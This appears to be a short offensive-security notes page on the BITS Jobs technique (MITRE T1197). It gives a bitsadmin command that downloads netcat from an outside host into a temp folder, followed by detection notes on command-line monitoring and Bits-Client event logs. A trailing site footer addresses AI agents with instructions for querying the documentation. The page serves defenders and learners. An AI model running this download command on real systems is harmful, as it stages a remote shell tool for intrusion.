# BITS Jobs

## Execution

{% code title="attacker\@victim" %}

```c
bitsadmin /transfer myjob /download /priority high http://10.0.0.5/nc64.exe c:\temp\nc.exe
```

{% endcode %}

![](/files/-LIIE2v7H5sGYQO7l9PB)

## Observations

Commandline arguments monitoring can help discover bitsadmin usage:

![](/files/-LIIE7XGZgY-lS5y1ja4)

`Application Logs > Microsoft > Windows > Bits-Client > Operational` shows logs related to jobs, which you may want to monitor as well. An example of one of the jobs:

![](/files/-LIIG9BKGxsQX8C_E3Ra)

## References

{% embed url="<https://attack.mitre.org/wiki/Technique/T1197>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security/persistence/t1197-bits-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
